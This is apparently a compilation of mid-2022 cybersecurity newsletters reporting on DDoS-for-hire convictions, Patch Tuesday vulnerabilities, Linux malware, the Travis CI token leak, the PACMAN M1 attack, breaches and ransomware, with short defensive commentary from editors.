A US district judge in California sentenced Matthew Gatrel to two years in prison for operating distributed-denial-of-service (DDoS) attack for hire websites. The sites Gatrel ran launched more than 200,00 DDoS attacks. In September 2021, Gatrel was found guilty of conspiracy to commit unauthorized impairment of a protected computer, conspiracy to commit wire fraud, and unauthorized impairment of a protected computer. A co-defendant pleaded guilty before the trial began.
- This is similar to moving from arresting and sentencing one person buying drugs or weapons to doing so to a dealer selling to dozens – obviously a good thing. The next step is going after the sketchy hosting/IaaS companies providing capacity to some “cybercrime as a service” criminals. Even better would be ISP ingress and egress filtering of obviously malicious traffic.
- Having DDoS protection must become SOP for internet facing services. While court cases like this may provide some deterrence, having active technical countermeasures in place will provide a more rapid return, and possibly help your CISO sleep at night.
Read more in
- “Downthem” DDoS-for-Hire Boss Gets 2 Years in Prison
- Man gets two years in prison for selling 200,000 DDoS hits
- Illinois Man Sentenced to 2 Years in Federal Prison for Operating Subscription-Based Computer Attack Platforms
40 high-severity vulnerabilities included in June’s Patch Tuesday
Microsoft released its monthly security update Tuesday, disclosing 55 vulnerabilities in the company’s firmware and software. One of these vulnerabilities is considered critical, 40 are listed as high severity, and the remainder is considered “moderate.” The most serious issue is CVE-2022-30136, a remote code execution vulnerability in the Windows Network File System (NFS) service, version NFSv4.1, with a severity score of near-maximum 9.8. An attacker can exploit the vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to execute remote code. To mitigate this vulnerability, users are advised to disable the vulnerable version NFSV4.1 and restart the NFS server or reboot the machine. Microsoft SharePoint server contains a remote code execution vulnerability, CVE-2022-30157, with a severity score of 8.8.
Read more in
Symbiote malware can remain undetected on Linux machines
A new Linux malware that can go undetected on infected machines is being used to target the financial sector in Latin America. Once the “Symbiote” malware infects the machine, it hides itself, making infections hard to detect. If successful, the malware provides a backdoor for the threat actor and allows them to log in as any user on the machine with a hardcoded password. They can also execute arbitrary code on the infected machine with the highest privileges. Because of its stealth, security researchers are unaware how widespread the campaign currently is and are unsure if it can even be detected by conventional security software.
Read more in
Microsoft accused of concealing Azure vulnerabilities
Amit Yoran, the CEO of vulnerability management platform Tenable, published a LinkedIn post on Monday accusing Microsoft of downplaying the severity of two Azure vulnerabilities his team reported to the company earlier this year, and only patching one of them.
Quoting from a blog post by James Sebree, Principal Research Engineer at Tenable:
“It took entirely too much effort to get any sort of meaningful response from our case agent. Despite numerous attempts at requesting status updates via emails and the researcher portal, it wasn’t until we reached out via Twitter that we would receive responses. During the disclosure process, Microsoft representatives initially seemed to agree that these were critical issues. A patch for the privilege escalation issue was developed and implemented without further information or clarification being required from Tenable Research. This patch was also made silently and no notification was provided to Tenable. We had to discover this information for ourselves.
During the final weeks of the disclosure process, MSRC began attempting to downplay this issue and classified it as a “best practice recommendation” rather than a security issue. […] It wasn’t until we notified MSRC of the intent to publish our findings that they acknowledged these issues as security-related. At the eleventh hour of the disclosure timeline, someone from MSRC was able to reach out and began rectifying the communication mishaps that had been occurring.
But while this looks like a bungled bug report, both Yoran and Sebree say this is part of a larger trend and “repeated pattern of behavior” where Microsoft intentionally tries to downplay or hide a security issue from its customers.
The two points to similar recent reports from companies like Wiz and Orca Security, both of which have had to deal with Microsoft botching patches and trying to hide the issue from its customers.
“For an IT infrastructure provider or a cloud service provider that is not being transparent, the stakes are raised exponentially,” Yoran said on Monday.
“Without timely and detailed disclosures, customers have no idea if they were, or are, vulnerable to attack…or if they fell victim to attack prior to a vulnerability being patched. And not notifying customers denies them the opportunity to look for evidence that they were or were not compromised, a grossly irresponsible policy,” he added.
“The fox is guarding the henhouse,” Yoran said.
But the reason we chose to highlight this issue goes far beyond how Microsoft deals with the disclosure of vulnerabilities in its Azure cloud service.
While the OS maker has gone through a period in recent years where it was far more open with security researchers and its patching process, they appear to be going back into their shell again and actively trying to hide the severity of certain security issues from its users.
One of the early indicators of this was the redesign of its Security Update Guide in September 2020. At the time, the company removed a lot of verbose information about security bugs, replacing bug descriptions with a soup of numbers and generic terms that even some of today’s most experienced security researchers can barely understand and put into context.
At the time, Bob Huber, Chief Security Officer at Tenable, called it “a bad move, plain and simple.”
“With this new format, end users are completely blind to how a particular CVE impacts them. What’s more, this makes it nearly impossible to determine the urgency of a given patch. It’s difficult to understand the benefits to end-users,” Huber told this reporter in an email back in 2020.
“However, it’s not too difficult to see how this new format benefits bad actors. They’ll reverse engineer the patches and, by Microsoft not being explicit about vulnerability details, the advantage goes to attackers, not defenders. Without the proper context for these CVEs, it becomes increasingly difficult for defenders to prioritize their remediation efforts. Context is king and it’s extremely disappointing to see Microsoft remove that from this equation.”
But since then, more voices also started speaking up about their bad experiences when reporting vulnerabilities to Microsoft’s bug bounty program, with many issues either being ignored, downplayed, misunderstood, intentionally left without a patch, or not even classified as security issues—adding to a general trend where Microsoft appears to be trying its best to downplay any security issue reported to its security engineers.
Whatever is going on at the Microsoft Security Response Center, it appears that’s rubbing a lot of today’s top researchers the wrong way, but also creating a lot of frustration for those who have to deal with the company’s technology on a daily basis, especially from a security posture.
New Aadhaar leak
An Indian security researcher told TechCrunch that the website of PM-Kisan, an Indian government project aimed at providing Indian farmers with basic financial income, has leaked their Aadhaar numbers. The researcher said he found the issue in January, and it took the agency more than four months to fix it, with the website being patched in late May.
Firefox Total Cookie Protection
Mozilla has rolled out a new feature to Firefox users this week named Total Cookie Protection. The feature works by limiting access to cookies to the website where they were created, which has the side effect of preventing tracking companies from using the same cookies to track users browsing from across the web, from site to site. Mozilla described Total Cookie Protection as its “strongest privacy protection to date.”
Thunderbird comes to Android
The Thunderbird Foundation announced that the K-9 open-source Android email client has officially joined the Thunderbird project and will soon be rebranded and relaunched as Thunderbird for Android.
Starting June 15, 2022, Microsoft has retired its Internet Explorer web browser from some versions of Windows 10. On affected versions, when users try to open IE or an URL, they will be redirected to Microsoft’s newer Edge browser instead. IE did not ship with Microsoft’s newest Windows 11 OS at all. More in Microsoft’s IE retirement FAQ page.
Chrome’s Rust migration
In its quarterly security newsletter for Q1 2022, Google said that work has continued on moving some of the Chrome codebase from C++ to Rust, but the Chrome team does not know if they can ergonomically mix Rust with C++ in the Chromium code yet. In addition, the Chrome team said it is also continuing its efforts to put the browser’s networking service into its own sandbox process.
Avast said it detected new attacks in Brazil carried out by the GhostDNS threat actor. This group breaks into SOHO routers to modify DNS settings that resolve certain DNS queries to malicious sites.
Threat intel firm CloudSEK says it observed selling a “battle-tested” reverse proxy, PHP-based phishing app called NakedPages on a cybercrime forum. The threat actor claims the toolkit can be used to phish users of Google and Microsoft Office.
DownThem & AmpNode
The operator of the DownThem and the AmpNode DDoS-for-hire services was sentenced to two years in prison, according to the US DOJ. Investigators said that DownThem had more than 2,000 customers at the time of its owner’s arrest and had been used to launch more than 200,000 attacks. The owner, Matthew Gatrel, 33, of Illinois, ran the service with co-administrator Juan Martinez, 29, of Pasadena, who also pleaded guilty and was sentenced to five years of probation last year.
Hacktivist group DragonForce Malaysia announced last week a campaign of DDoS attacks against the Indian government and private sector entities as part of a new operation they’re calling OpsPatuk. DDoS mitigation provider Radware, which has been tracking the recent attacks, said the attacks are a direct result of a BJP politician attacking the Prophet Muhammad, comments that have outraged many Muslim communities last week.
Another record-breaking DDoS attack
Cloudflare said that it mitigated last week a 26 million request per second DDoS attack. According to the company, the attack is now the largest HTTPS DDoS attack on record, beating a previous 17.2M rps HTTPS DDoS attack recorded last year.
Avast has published a report on Syslogk, a new kernel rootkit found in the wild and targeting Linux systems. Researchers who analyzed the malware said Syslogk was based on Adore-Ng, a relatively old, open-source, well-known kernel rootkit for Linux, which initially targeted kernel 2.x but is currently updated to target kernel 3.x releases.
Cybersecurity firm Zscaler has published a report on PureCrypter, a malware loader strain that has been for sale on underground forums since March 2021. According to the company, the malware is written in .NET and has been observed distributing a variety of remote access trojans and information stealers.
Confiant is scheduled to release a report about a new tool advertised in cybercrime circles that can allow threat actors to create fake NFT minting pages that actually steal a victim’s NFT ownership and even Ethereum funds. We’ll update the web version of this newsletter once the report goes live, a few hours after the email version of this newsletter.
Palo Alto Networks said on Monday that it observed the GALLIUM APT group conduct new attacks expanding from its usual targeting of telecommunication operators to also go after financial institutions and government entities. Targeted entities were located in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam, and researchers said the group also debuted a new remote access trojan for these attacks, named PingPull.
Check Point has detailed a recent Iranian spear-phishing operation aimed against former Israeli officials, high-ranking military personnel, research fellows in research institutions, and think tanks. According to the company, some of the high-profile targets of this operation included:
- Tzipi Livni – former Foreign Minister and Deputy Prime Minister of Israel.
- A former Major General who served in a highly sensitive position in the Israeli Defense Forces (IDF).
- Chair of one of Israel’s leading security think tanks.
- A former US Ambassador to Israel.
- A former Chair of a well-known Middle East research center.
- A senior executive in the Israeli defense industry.
The Microsoft Patch Tuesday security updates for June 2022 are out. The OS maker fixed 61 security vulnerabilities this month, including an official patch for the Follina Office zero-day vulnerability that is currently under mass exploitation by both nation-state and cybercrime groups. An analysis of this month’s patches is available on the ZDI blog.
Other Patch Tuesday fixes
A team of academics from US universities has published a research paper on Tuesday detailing a new side-channel attack they have named Hertzbleed. This new attack targets Dynamic Frequency Scaling, a feature in modern x86 processors that allows CPUs to lower their frequency to consume less power if they aren’t used to their full extent. According to the research team, “Hertzbleed is a real, and practical, threat to the security of cryptographic software,” compared to many other previous side-channel attacks disclosed in the past. In their tests, the team said it was able to extract cryptographic keys from remote servers. All Intel CPUs are impacted, and a vast majority of AMD’s top processors, as well.
Orca Security has published in-depth technical details about a vulnerability known as SynLapse, a remote code execution impacting the Azure Synapse Analytics and Azure Data Factory services. The vulnerability allowed attackers to hijack Azure Synapse workspaces, obtain Synapse customer account credentials, and bypass tenant Azure tenant separation.
Google’s Project Zero team has published a root-cause analysis of a zero-day first abused in the wild in 2013. P0’s Maddie Stone discovered that the zero-day, initially patched in 2013, had its fix regressed in 2016 and was re-exploited again in 2022.
Microsoft buys Miburo
Microsoft announced this week plans to acquire cyber threat analysis and research company Miburo. The company is specialized in the detection of and response to foreign information operations.
Vulnerability: Credential leak in Travis CI log API
Team Nautilus at Aquasec has found an ongoing vulnerability affecting public instances of the Travis CI platform. The vulnerability exposes tens of thousands of user tokens (typically for GitHub, AWS, and DockerHub) in historical Travis CI logs that are accessible through an API. Similar issues have been reported in 2015 and 2019, and in this update we featured news of token leaks on Travis CI late last year.
Travis CI is a popular CI/CD platform that acts as a build orchestrator for software artifacts. As such, the platform requires access to various 3rd party platforms such, like source code repositories, container registries, and cloud platforms. Typically, the access credentials to these resources are stored as secrets in the CI/CD platform, only for internal use, and thus not accessible to the casual observer.
However, the researchers discovered that they could access historical logs of build jobs through a publicly accessible API. Using scripts to paginate through the log files, they determined that approximately 770 million logs were exposed. By examining the contents, they were able to identify secret values associated with various platforms:
The researchers did reveal that Travis CI did provide some mitigation against mass leakage: the API endpoint was rate limited, in many cases the secret values were masked in the log files, and they also recommend various techniques for masking secrets and deleting old log files.
Nonetheless, the sheer volume of logs available through the API endpoint pagination meant that tens of thousands of secrets may be accessible, representing a significant risk to assets on impacted 3rd party platforms. The researchers quoted Travis CI’s response that the issue is “by design” — Travis CI has also previously be found wanting in their response to a similar leak. Users are urged to be cautious with credentials stored on Travis CI, including deleting log files, revoking and reissuing credentials, and narrowing down the roles in credentials to the bare minimum required to lessen the impact.
There are several important lessons to be learned here:
- Do not rely on security by obscurity — in this case, the platform stored old log files under an undisclosed endpoint but this could easily be reverse-engineered.
- Rate limiting is important, but it is only one element of an API defense strategy.
- Always have a plan for revoking and reissuing credentials, both in an emergency and as part of a security routine.
Article: Microsoft’s recommendations for mitigating against API threats
Microsoft has produced a high-quality set of recommendations for how to mitigate OWASP API security Top 10 threats with API management. Although primarily targeted at users of their Azure API tools (the balance of the recommendations focuses on using Azure platform features for secure configuration and monitoring), the recommendations are well-written and contain many excellent generic recommendations — I learned a lot here, and recommend bookmarking this as a checklist for hardening your APIs.
For me, some of the standout recommendations include:
- For API1:2019 — Broken object level authorization, the correct place for mitigation is through comprehensive authorization in the backend API code. Gateways can only offer limited defense, mainly by obscuring internal object identifiers.
- For API2:2019 — Broken authentication, leverage the power of the gateway to enforce uniform authentication across all endpoints by using standard methods, such as OAuth2 and JWT tokens.
- For API3:2019 — Excessive data exposure, again the best way to mitigate against this vulnerability is the judicious design of the data storage objects in the API backend code. Gateways can offer content validation but users should be aware of performance impacts with this method.
- For API4:2019 — Lack of resources and rate limiting, gateways can offer short-term and long-term rate limiting; use the OpenAPI definition to limit the amount of data that can be accessed by specifying length limits; use Cross-Origin Policy (CORS) but avoid wildcards; and revoke access for users who abuse resources.
- For API5:2019 — Broken function level authorization, the obvious recommendation is to requiring subscription keys for all endpoints by default and to avoid the use of wildcard endpoints.
- For API6:2019 — Mass assignment, the recommendations are similar to those for API3: manage the data transfer in the API backend code.
Thanks to Microsoft for the excellent set of recommendations.
Article: Views on why API security needs special attention
The Economic Times featured a thought-provoking read on why API security needs special attention — as the author astutely states “Web applications security is not API security”.
The most interesting observation for me was the benefits (and challenges) of the design-first approach for API development. On the upside, the use of a design-first approach through OpenAPI definitions allows for the enforcement of a very precise contract between the API and the client — quite different from web applications where the boundaries are very blurred. This is the essence of the positive security model that uses the OpenAPI definition as the contract and only allows known good and blocks everything else. The author notes the major caveat with this approach: time pressures on developers mean that a design-first approach might not always be feasible so they begin by coding the API, thereby losing the benefits of contract enforcement.
The author highlights additional factors that impact APIs security:
- Lack of visibility into API inventory can inhibit security initiatives.
- Traditional security mechanisms (like rate limiting and network security) are useful but not entirely sufficient at thwarting threats to modern APIs.
- Due to time pressures on developers and testers, business logic flaws may be hard to detect.
Some great insight into the topic — leverage the power of your OpenAPI definitions.
Travis CI API Exposes User Tokens
Researchers from Aqua’s Team Nautilus discovered that Travis CI API clear-text logs are available to anyone. The logs contain “tokens, secrets, and other credentials associated with popular cloud service providers such as GitHub, AWS, and Docker Hub.”
- It appears that in CI/CD, exposing credentials is a feature, not a bug. Automate rotating your credentials and assume they are lost if you are using the free version of Travis CI. This is likely to affect many open source projects using Travis CI to manage code deployment. This particular issue has existed in some form for years.
- This is described as the intended behavior for the Free Tier version of Travis CI. If you are going to continue to use the free tier version, the best mitigation, today, is to proactively rotate access tokens, minimizing the interval they are viable if discovered. Better still, investigate other options with a higher bar on protection of access tokens and related information, and properly fund key components such as your CI/CD tools.
Read more in
- Public Travis CI Logs (Still) Expose Users to Cyber Attacks
- Credentials for thousands of open source projects free for the taking—again!
- Travis CI API exposes thousands of user tokens that can let threat actors launch attacks
- Exposed Travis CI API Leaves All Free-Tier Users Open to Attack
PACMAN Hardware Attack Defeats Apple M1 Pointer Authentication
Researchers at MIT’s Computer Science & Artificial Intelligence Laboratory (CSAIL) have developed a new attack that defeats a security measure in Apple’s M1 CPU. Dubbed PACMAN, the hardware attack involves targeting the chip’s Pointer Authentication feature.
- This is a good example of needing to look at least two levels deep when thinking of vulnerabilities and risk. For this attack to succeed, among other things vulnerable software needs to be running on the processor. I can imagine the CPU test team running exhaustive tests when designing, sizing and testing the Pointer Authentication Code but not specifically trying enough combinations of unpatched/vulnerable OS and applications.
- The exploitability and significance of this vulnerability outside of a lab demo has been disputed in part due to the limitations imposed on collecting high resolution timing data. At this point, this isn’t anything you should spend time worrying about. Skip this story.
- This is essentially a proof of concept attack, and the Pac-Man write up is an interesting read. Expect Apple to continue to take steps to limit loading kernel modules to mitigate risks for this sort of attack.
Read more in
- The PACMAN Attack
- Researchers discover a new hardware vulnerability in the Apple M1 chip
- Design Weakness Discovered in Apple M1 Kernel Protections
- Apple M1 chip contains hardware vulnerability that bypasses memory defense
- New PACMAN hardware attack targets Macs with Apple M1 CPUs
Kaiser Permanente Breach Affects 70,000 Patients
Kaiser Permanente says that an employee’s email account was compromised in early April, putting personally medical information of close to 70,000 patients at risk of exposure. The compromised data include names, medical record numbers, and lab test results. The US Department of health and Human Services Office for Civil Rights is investigating the incident.
- Kaiser Permanente says its time-to-detect was a few hours, so the bigger question is why were medical records for 70,000 customers accessible in an employee’s email? The question is not why such sensitive data was in email – it almost always is, because quite often IT does not provide users with collaboration and analysis tools (or the users ignore them) and good old spreadsheets or .csv files are exchanged between users to meet immediate business needs. Not all that hard to detect (auditors find it all the time) but a regular process should be in place to detect PHI in user email queues.
- Email mailboxes are a treasure trove for attackers as people often use their mailbox as a database for storing all types of data, including passwords, personal data, and other highly sensitive material. However, most companies do not apply appropriate security to their email systems thinking of it as being only a communications channel. Companies should ensure users have MFA deployed for all email users, monitor for unusual login patterns, apply DLP for sensitive content, and where possible restrict access to sensitive mailboxes or mailboxes of high value targets from known and trusted locations.
- Kaiser has multiple regions with segmented data. This breach impacted Kaiser Foundation health plan of Washington. While we have been focused on security of patient facing devices in healthcare, don’t overlook back-end systems such as email which are also under attack and can also benefit from MFA and context driven access controls.
- The compromise of an employee’s e-mail account should not be sufficient to compromise PPI. One notes that, again for reasons of convenience, strong authentication is rarely required on e-mail. E-mail, along with browsing, messaging, and social media, is a major source of credential compromise and must be effectively controlled (strong authentication) and isolated from mission critical applications.
Read more in
- Kaiser Permanente Breach Exposes Data on 70K Patients
- Kaiser Permanente data breach exposes health data of 69K people
The World Economic Forum’s Atlas Initiative Aims to Map Cybercrime Ecosystem
The World Economic Forum Atlas Initiative is a collaborative research project with the goal of mapping the cybercrime ecosystem. The project will trace relationships between criminal groups and their infrastructure. Derek Manky, chief security strategist at FortiGuard Labs, which is one of the participating organizations, said, “We’re looking at the non-traditional artifacts. Think: crypto addresses and bank accounts, phone numbers, emails, things that ultimately help to build the challenge of attribution, which we always say is the holy grail.”
- Hopefully this interesting initiative will provide additional information and data on how we can tackle criminal gangs not just at the technical level but perhaps in other ways, such as financial measures and sanctions.
Read more in
Ransomware Attacks Targeting Costa Rica are Among First Targeting a Country’s Government
The ransomware attacks that have plagued Costa Rica since April are unusual in that the group responsible for the attacks has openly called for the overthrow of the country’s government. Costa Rica has declared a national emergency due to the attacks. The first attack began in April targeted systems of government ministries. The second attack began on May 31 and targeted the Costa Rican Social Security Fund (CCSS) which oversees most of the country’s public healthcare system.
- Think about having all your locations and affiliates under attack. Then consider how you would respond, contain, eradicate and prevent recurrence. Do you have the plan and supporting relationships, practice and training? How about your suppliers? Don’t forget to verify your NDAs cover these use cases.
Read more in
Envoy Proxy DoS Vulnerability
Researchers from JFrog Security discovered a denial-of-service (DoS) vulnerability in Envoy Proxy. The flaw exists because “the code that is in charge of decompressing the user supplied data does not implement a size limit for the output buffer.” The vulnerability could be exploited to crash the proxy server; it has been fixed in Envoy versions 1.19.5, 1.20.4, 1.21.3 and 1.22.1. If upgrading is not possible, JFrog recommends that organizations ensure their configuration does not allow Brotli decompression.
- You need to update to the new firmware. Also, if you’re enabling decomposition of Brotli or GZip files. change the Brotli decompressor for GZip. Better still, disable that decompression.
Read more in
- Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
- Patches issued for denial-of-service vulnerability found in cloud-native Envoy proxy
- DoS Vulnerability Allows Easy Envoy Proxy Crashes
Google Fixes Seven Vulnerabilities in Chrome for Desktop
Google has updated the stable channel for Chrome Desktop to version 102.0.5005.115 for Windows, Mac and Linux. The newest version of the browser includes fixes for seven security issues; four are rated high severity: a use-after-free vulnerability in WebGPU; an out-of-bounds memory access vulnerability in WebGL; an out-of-bounds read vulnerability in Chrome’s compositing component; and a use-after-free vulnerability in ANGLE.
- Don’t expect browser updates to settle into a patch Tuesday rhythm anytime soon. With the attention to finding and exploiting browser vulnerabilities, make sure you can readily and actively keep your browsers updated, including a defined process where the relaunch, required to activate the new version, is enforced. Be certain you’re actively tracking not just Chrome, but chromium-based browsers as well. Don’t ignore your other browsers, they are also being researched for vulnerabilities.
Read more in
- Stable Channel Update for Desktop
- Time to update: Google patches seven Chrome browser bugs, four rated ‘high’ risk
Gallium Hacking Group’s New Remote Access Trojan is Hard to Detect
Researchers from Palo Alto Networks’ Unit 42 have found that a known state-sponsored Chinese hacking group is now using a new remote access trojan (RAT). The RAT, dubbed “PingPull,” uses the Internet Control Message Protocol (ICMP) to hide communications with its command-and-control infrastructure. While this is not a new approach, many organizations still do not monitor ICMP traffic. The Gallium hacking group is known for targeting telecommunications companies, financial institutions, and government organizations.
Read more in
- GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool
- Researchers ID new RAT developed by Chinese hacking group with growing target list
- Chinese-linked APT adds governments, financial companies to target list
- Gallium hackers backdoor finance, govt orgs using new PingPull malware
Recently unsealed court documents revealed that authorities compelled two travel companies – US-based Sabre and UK-based Travelport – to provide information regarding the movements of a Russian individual who was the subject of a hacking investigation. The target of the surveillance, Aleksei Burkov, was arrested in Israel in 2015 and extradited to the US in 2019.
- Another case of using the All Writs Act (which is very broad) to compel companies to release information relevant to an investigation. You may recall this was also used against Apple in the 2015 San Bernardino shooting case where the FBI wanted them to unlock the suspects phone. The trick is to make sure requests like this are not only specific to the active case, but also represent responses those served can actually provide.
- Any data collected is accessible via a court order. Most privacy policies and related legislation have specific exemptions built in to allow this. Not sure why anybody is surprised that this is happening.
- This action involved the courts, was narrowly crafted, and was disclosed on a timely basis. However, it involved the use of the ancient “All Writs Act” which the ACLU has found troubling and which has not been recently tested by appeals.
Read more in
Goodbye, IE (Mostly)
Microsoft will stop supporting most versions of Internet Explorer (IE) as of Wednesday, June 15. The browser was launched in August 1995. The IE desktop application will be disabled. Users are encouraged to move to Microsoft Edge with IE mode, which will be supported through at least 2029.
- The market share of IE is below 1%, so not a big issue. Browser-specific applications should by now be anomalies – from a security perspective, Chrome-based browsers are the market share big dog that vulnerability management needs to focus on, but Safari, Firefox and Edge will stay in the mix.
- Use Edge with the IE Mode if needed. Suggest rigorous testing without IE Mode to determine your reliance on backwards compatibility, possibly eliminating browser lock in.
Read more in
- What is the Lifecycle policy for Internet Explorer?
- Internet Explorer (almost) breathes its final byte on Wednesday
- June 15: It’s the end of the Internet Explorer era
Google shuts down YouTube Russian propaganda channels
In its quarterly disinformation report for Q2 2022, Google said last week that it suspended more than 190 YouTube channels and 12 Google Ads accounts linked to Russia’s disinformation efforts surrounding its invasion of Ukraine. Forty-four of these accounts were linked to the Internet Research Agency (IRA), the Russian internet troll farm based in Sankt Petersburg, an entity that has been active for years and still operates despite several US Treasury sanctions.
Google said these accounts published content that was supportive of Russia’s invasion of Ukraine and Russian President Vladimir Putin and critical of NATO, Ukraine, Ukrainian President Volodymyr Zelenskyy, and Russian opposition politician Alexei Navalny. Some accounts also tried to justify the activity of Russian private military contractor Wagner Group in Ukraine and Africa, where they have been accused of civilian killings and other atrocities.
Google’s crackdown comes as the company also suspended in the first quarter of the year more than 715 YouTube accounts used for the same purpose and after the company also delisted multiple Russian state-media news outlets from its Google News section in March.
“The information domain is a critical theater of war for the Kremlin,” said researchers from the Brookings Institution think tank earlier this year in March in a report analyzing news search results for Ukraine-related terms. The report—published before Google moved to remove Russian state media outlets from its News section—found that sites like TASS dominated Google’s search results, helping the Kremlin drive its message to huge audiences.
Companies like Google, Microsoft, Twitter, and Meta (formerly Facebook) have been trying to shut down Russia’s genocide-washing propaganda but with little results, especially on Twitter and Facebook, where copy-pasta bot networks and especially troll farms continue to dominate discussions.
While Twitter and Meta have intervened to limit the reach of official Russian state news outlets, tweets about Ukraine, Russia, and NATO are often flooded with bots and trolls. Similarly, on Facebook, bots and trolls also flood the comments sections in news stories from western media outlets, often driving the discussions toward Russian-friendly narratives.
In most cases, these disinformation and propaganda efforts often follow the same patterns, namely that Ukraine has committed genocide against its Russian-speaking minority and Russia is only trying to save them, narratives that have been thoroughly debunked by multiple sources ranging from Russian independent media to the EU itself.
Optimism hack happy ending
The threat actor who intercepted a transfer of nearly $19 million (at the time) between the Wintermute and Optimism cryptocurrency platforms last week has decided to return the stolen funds, according to blockchain security firm PeckShield.
German energy suppliers
German energy suppliers Entega and Mainzer Stadtwerke were hit by a cyber-attack over the weekend. The attacks, believed to be unrelated, blocked access to companies’ email servers and public websites, but industrial systems remained unaffected.
Wiz, the cloud security firm that discovered the OMIGOD vulnerability last year, has continued its research into the types of middleware products installed by default on cloud servers. The company has published a GitHub repo with cloud middleware (aka cloud agents) installed and used across the major cloud service providers (Azure, AWS, and GCP). These agents—13 right now— are usually installed without the customers’ awareness or explicit consent.
Firefox reducing sandbox escape attack surface
In its quarterly security newsletter for Q1 2022, Mozilla said it deployed a new security feature to Firefox in v96 that will reduce the attack surface for Firefox sandbox escapes (attack from the browser to the underlying OS).
Microsoft’s security team said on Saturday that at least two nation-state groups—tracked as DEV-0401 and DEV-0234—are now exploiting the Atlassian Confluence RCE zero-day vulnerability CVE-2022-26134 that was disclosed last week. Microsoft researchers said that this vulnerability has also been used for device and domain discovery, but also for the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and even ransomware.
Confiant said in a report last week that it detected a new threat actor—that it named SeaFlower—targeting cryptocurrency users. Since at least March this year, the group has operated websites cloned after legitimate cryptocurrency wallets. These websites, which target Chinese-speaking audiences, host backdoored wallet apps that steal users’ private wallet seeds.
Malwarebytes reported this week that its telemetry indicated that ASyncRAT had become the most widespread malware payload delivered via email spam in the first half of 2022. ASyncRAT was ranked #3 throughout 2021, behind Dridex and TrickBot.
An online scammer was detained in Finland last week after defrauding local car dealerships. Investigators said they were able to identify the suspect after they took a high-quality photo of a fake check where one of their fingertips was also visible, allowing them to identify them based on police records. (h/t @mikko)
Nigerian bank robbers
Nigerian police said they detained three suspects for a daring scheme to hack into the networks of at least 11 Nigerian banks and steal funds. According to authorities, the group had bribed an employee at one of the banks to leave critical network gateways open so they could gain access to the bank network and steal funds. Per data recovered from seized devices, the group was planning to use the same method on 10 other banks if this first intrusion went without a hitch. [Coverage in BankInfoSecurity]
Adconion execs plead guilty
Three of four Adconion executives pleaded guilty last week to fraud and misrepresentation via email. The three were charged in 2018 for hijacking IP address blocks from their inactive owners. Some of these IP addresses were later used to send email spam.
Few NetWalker victims complained
Speaking at the RSA security conference last week, FBI and DOJ officials said that only a quarter of all victims of the NetWalker ransomware filed complaints with authorities. Law enforcement seized NetWalker’s infrastructure in January 2021, and the gang ceased operations following the operation.
Palo Alto Networks has published a technical report on HelloXD, a ransomware strain that has been active since November 2021. The security firm also managed to link the ransomware to a threat actor active on underground cybercrime forums named “x4k.”
Security firm McAfee said it found malicious functionality designed to steal Instagram account credentials in an Android app designed to allow users to modify the default Instagram app and in several apps designed to increase Instagram account followers and post likes.
CERT Ukraine said in a security alert on Friday that the Sandworm APT group was targeting Ukrainian news organizations with malicious emails. Officials said that more than 500 radio stations, newspapers, and news agencies were targeted.
Zscaler has published a report on a .NET-based backdoor used by the Lyceum APT that the group had been using to target Middle Eastern organizations in the energy and telecommunication sectors. According to researchers, the malware uses a technique called “DNS Hijacking” in which an attacker-controlled DNS server manipulates the responses of DNS queries to redirect targets to malicious sites.
Academics from MIT CSAIL have disclosed a novel attack against Apple M1 processors. The attack, named PACMAN, can elevate access from userland to kernel space by bypassing Pointer Authentication (PAC). The PACMAN attack can be executed via a network.
Kubernetes servers are affected by a vulnerability (CVE-2021-25748) in their Nginx integration where “a user that can create or update ingress objects can use a newline character to bypass the sanitization” and “obtain the credentials of the ingress-nginx controller.” The Kubernetes team said that in default Kubernetes configurations, this credential has access to all secrets in the cluster.
Trendnet TEW-831DR WiFi routers have been found to have multiple vulnerabilities exposing the owners of the router to potential intrusions of their local WiFi network and possible takeover of the device.
The Drupal CMS has released out-of-cycle security updates to fix bugs in third-party libraries.
Backdoor account in thermal cameras
IoT security company SEC-Consult disclosed last week that IRAY A8Z3 thermal cameras contain hardcoded credentials for their web application in one of its firmware binary, which can be extracted and used by attackers to modify camera settings. In addition, the same camera model also contains several other vulnerabilities. After 16 months, the vendor has yet to patch any of the reported issues.
Backdoor in Mitel VoIP phones
Mitel Networks has patched its 6900 IP Series VoIP phones and removed a backdoor functionality from the firmware that would have allowed remote attackers to run malicious commands on its devices[1, 2]. The vulnerability was found and reported by German pen-testing firm Syss.
U.S. ordered travel companies to spy on Russian hacker for years
Forbes ($): Solid reporting from @iblametom by way of a Forbes legal challenge that unsealed documents revealing how U.S. authorities obtained an court order to compel travel data companies — Sabre and Travelport — to continually turn over the travel records of notorious Russian hacker Aleksei Burkov to catch him while he traveled overseas outside of Russia. The feds used an obscure provision in U.S. law called the All Writs Act, which might ring a bell for those who lived through Crypto Wars 2.0 when the FBI tried to force Apple to backdoor its own iPhone software to break into a terrorist’s device. Great work here revealing the scope of this kind of underreported surveillance.
Read more in
- U.S. ordered travel companies to spy on Russian hacker for years
- Why the Hell Did America Just Send This Master Cybercriminal Back to Russia?
- The Apple-FBI Debate Over Encryption
- The U.S. forced tech companies to spy on Russian hacker using legal loophole
U.S. warns Chinese hackers are targeting ISPs and telecoms
The Record: Strong warnings from the U.S. government about how Chinese state-sponsored hackers have been targeting internet providers and major telecoms firms around the globe for the past two years by using known vulnerabilities — and what action network defenders can take to protect their organizations. It comes as new research dropped from Sentinel Labs about a new espionage group dubbed Aoqin Dragon, which uses poisoned Word documents to plant a backdoor and get access to the wider network.
Read more in
- US agencies detail the digital ‘plumbing’ used by Chinese state-sponsored hackers
- US: Chinese govt hackers breached telcos to snoop on network traffic
- Chinese ‘Aoqin Dragon’ gang runs undetected ten-year espionage spree
RSA 2022: Cloud providers still using secret middleware
The Register: I didn’t need to go to RSA to still get COVID — but for those who braved the in-person event, The Register has your news rundown covered. Among the highlights includes Wiz research that found vulnerabilities in cloud middleware, and a renewed plea from the private sector for government help. Plus, word is getting around about the emerging threat of hacking-for-hire outfits targeting election officials. It’s a tactic seen most recently in Poland and Catalonia. And finally — bonus Enigma in the wild.
Read more in
- OMIGOD: Cloud providers still using secret middleware
- The cloud gray zone—secret agents installed by cloud service providers
